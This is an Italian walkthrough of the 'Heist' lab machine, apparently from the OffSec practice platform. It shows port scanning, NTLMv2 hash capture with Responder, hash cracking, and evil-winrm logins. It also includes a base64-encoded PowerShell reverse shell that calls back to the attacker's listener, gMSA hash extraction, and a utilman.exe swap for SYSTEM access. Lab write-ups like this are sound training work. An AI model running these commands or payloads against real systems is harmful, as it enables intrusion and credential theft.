Heist
Network
- Ip Target:
192.168.166.165
Enumeration
| Port | Service | Version | Notes |
|---|---|---|---|
| 53/tcp | domain | DNS | |
| 88/tcp | kerberos-sec | KERBEROS | |
| 135/tcp | msrpc | MSRPC | |
| 139/tcp | netbios-ssn | SMB | |
| 389/tcp | ldap | LDAP | |
| 445/tcp | microsoft-ds | SMB | |
| 464/tcp | kpasswd5 | ||
| 593/tcp | http-rpc-epmap | MSRPC | |
| 636/tcp | ldapssl | LDAP | |
| 3268/tcp | globalcatLDAP | LDAP | |
| 3269/tcp | globalcatLDAPssl | LDAP | |
| 3389/tcp | ms-wbt-server | RDP | |
| 5985/tcp | wsman | OMI | |
| 8080/tcp | http-proxy | HTTP | |
| 9389/tcp | adws |
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Heist]
└─$ sudo nmap -Pn -p- -oN alltcp_ports.txt 192.168.166.165
[sudo] password for momphucker:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-27 11:19 CET
Nmap scan report for 192.168.166.165
Host is up (0.065s latency).
Not shown: 65513 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
5985/tcp open wsman
8080/tcp open http-proxy
9389/tcp open adws
49666/tcp open unknown
49667/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49677/tcp open unknown
49703/tcp open unknown
49758/tcp open unknown
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Heist]
└─$ sudo nmap -Pn -sC -sV -p53,88,135,139,445,464,593,636,3268,3269,3389,5985,8080,9389 -oN alltcp.txt 192.168.166.165
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-27 11:22 CET
Nmap scan report for 192.168.166.165
Host is up (0.064s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-27 10:22:16Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: heist.offsec0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC01.heist.offsec
| Not valid before: 2024-08-01T02:27:33
|_Not valid after: 2025-01-31T02:27:33
| rdp-ntlm-info:
| Target_Name: HEIST
| NetBIOS_Domain_Name: HEIST
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: heist.offsec
| DNS_Computer_Name: DC01.heist.offsec
| DNS_Tree_Name: heist.offsec
| Product_Version: 10.0.17763
|_ System_Time: 2024-12-27T10:22:20+00:00
|_ssl-date: 2024-12-27T10:23:00+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8080/tcp open http Werkzeug httpd 2.0.1 (Python 3.9.0)
|_http-title: Super Secure Web Browser
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-12-27T10:22:22
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.64 seconds
Port 8080
Provo a chiamare il webserver, aperto sulla mia macchina alla porta 8080, e sembra comunicare corretamente:
Exploit
A questo punto sulla mia macchina chiudo il webserver ed eseguo responder:
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Heist]
└─$ sudo responder -I tun0
e il responder in ascolto cattura delle informazioni interessanti, username e hash:
Bash
[...]
[HTTP] NTLMv2 Client : 192.168.166.165
[HTTP] NTLMv2 Username : HEIST\enox
[HTTP] NTLMv2 Hash : enox::HEIST:1393e23cd8ba3883:218AD045683DFE5467764B9C7D2C1A7F:01010000000000003CEB5E9B4F58DB01F65011178EF2CD0D0000000002000800350036003600560001001E00570049004E002D004C004F004A00430051003200310038004200440055000400140035003600360056002E004C004F00430041004C0003003400570049004E002D004C004F004A00430051003200310038004200440055002E0035003600360056002E004C004F00430041004C000500140035003600360056002E004C004F00430041004C000800300030000000000000000000000000300000C4F51C6E9DB9499D59C386C317DB4FE1D9EF380289201E62A8474177A8845FCE0A001000000000000000000000000000000000000900260048005400540050002F003100390032002E003100360038002E00340035002E003200340038000000000000000000
[...]
Provo ad eseguire il crack dell'hash con hashcat, dopo aver inserito l'hash nel file hashes.txt:
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Heist]
└─$ hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt -o cracked.txt
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Heist]
└─$ cat cracked.txt
ENOX::HEIST:1393e23cd8ba3883:218ad045683dfe5467764b9c7d2c1a7f:01010000000000003ceb5e9b4f58db01f65011178ef2cd0d0000000002000800350036003600560001001e00570049004e002d004c004f004a00430051003200310038004200440055000400140035003600360056002e004c004f00430041004c0003003400570049004e002d004c004f004a00430051003200310038004200440055002e0035003600360056002e004c004f00430041004c000500140035003600360056002e004c004f00430041004c000800300030000000000000000000000000300000c4f51c6e9db9499d59c386c317db4fe1d9ef380289201e62a8474177a8845fce0a001000000000000000000000000000000000000900260048005400540050002f003100390032002e003100360038002e00340035002e003200340038000000000000000000:california
- Credenziali:
enox:california
Accedo alla macchina con evil-winrm:
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Heist]
└─$ evil-winrm -i 192.168.166.165 -u enox -p 'california'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\enox\Documents> whoami
heist\enox
Per avere una shell interativa, apro un listener sulla porta 4455 ed seguo:
PowerShell
*Evil-WinRM* PS C:\Users\enox\Documents> powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuADIANAA4ACIALAA0ADQANQA1ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Heist]
└─$ nc -nvlp 4455
listening on [any] 4455 ...
connect to [192.168.45.248] from (UNKNOWN) [192.168.166.165] 50066
PS C:\Users\enox\Documents>
Infine catturo la flag local.txt
Privilege Escalation
Dopo aver trasferito sulla macchina target SharpHound.exe raccolto i dati utili da passare a BloodHound:
PowerShell
PS C:\Users\enox\desktop\wintools> .\SharpHound.exe --collectionmethods All --outputdirectory C:\Users\enox\desktop\wintools --outputprefix "bloodhound-file"
L'utente enox, che posseggo, fa parte del gruppo web admin che ha i privilegi Read GSMA Password
Tramite GMSAPasswordReader.exe precedentemente caricato sulla macchina target, recupero l'hash dell'utente svc_apache:
PowerShell
PS C:\Users\enox\desktop\wintools> .\gmsapasswordreader.exe --accountname svc_apache
.\gmsapasswordreader.exe --accountname svc_apache
Calculating hashes for Old Value
[*] Input username : svc_apache$
[*] Input domain : HEIST.OFFSEC
[*] Salt : HEIST.OFFSECsvc_apache$
[*] rc4_hmac : FC258E893FBB2444E5E7327348164F4A
[*] aes128_cts_hmac_sha1 : DC1E813E044FA6ABBE98A355F97E7B94
[*] aes256_cts_hmac_sha1 : D079C82F93EBDD71E4F90DDBB8A144B0B8FA9C844F8838C82A7A6955015B983C
[*] des_cbc_md5 : 61B3E3B0133813E6
Calculating hashes for Current Value
[*] Input username : svc_apache$
[*] Input domain : HEIST.OFFSEC
[*] Salt : HEIST.OFFSECsvc_apache$
[*] rc4_hmac : C9C9F97308956B4AEDD53C1351F47A84
[*] aes128_cts_hmac_sha1 : DE782FCFD097727B6D5634020DCAED9D
[*] aes256_cts_hmac_sha1 : 351EE53A3264114A654D9B5DBE0A245F5E0E4FBE4A381AEA1C281D9270AFE4F9
[*] des_cbc_md5 : D01949C757204F01
E accedo con evil-winrm usando l'hash C9C9F97308956B4AEDD53C1351F47A84 trovato:
PowerShell
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Heist]
└─$ evil-winrm -i 192.168.166.165 -u svc_apache$ -H 'C9C9F97308956B4AEDD53C1351F47A84'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_apache$\Documents>
A questo punto sono loggato come svc_apache$ con i seguenti privilegi:
PowerShell
*Evil-WinRM* PS C:\windows\system32> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeRestorePrivilege Restore files and directories Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Faccio un check sul privilegio unusuale SeRestorePrivilege. Da HackTricks risulta che:
Info
Questo privilegio fornisce l'autorizzazione per l'accesso in scrittura a qualsiasi file di sistema, indipendentemente dall'ACL (Access Control List) del file. Apre numerose possibilità di escalation, inclusa la possibilità di modificare servizi, eseguire il dirottamento DLL e impostare debugger tramite Opzioni di esecuzione file immagine tra varie altre tecniche.
E suggerisce i seguenti passi per la privile escalation:
Note
- Launch PowerShell/ISE with the SeRestore privilege present.
- Enable the privilege with Enable-SeRestorePrivilege).
- Rename utilman.exe to utilman.old
- Rename cmd.exe to utilman.exe
- Lock the console and press Win+U
A questo punto rinomino l'eseguibile utilman.exe in utilman.old e cmd.exe in utilman.exe:
Lancio rdesktop dalla macchina kali in modo da avere la schermata di login:
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Heist]
└─$ rdesktop 192.168.166.165
Core(warning): Certificate received from server is NOT trusted by this system, an exception has been added by the user to trust this specific certificate.
Failed to initialize NLA, do you have correct Kerberos TGT initialized ?
Core(warning): Certificate received from server is NOT trusted by this system, an exception has been added by the user to trust this specific certificate.
Connection established using SSL.
e premo Win+U per aprire la shell come SYSTEM
Non rimane che recuperare la flag proof.txt:
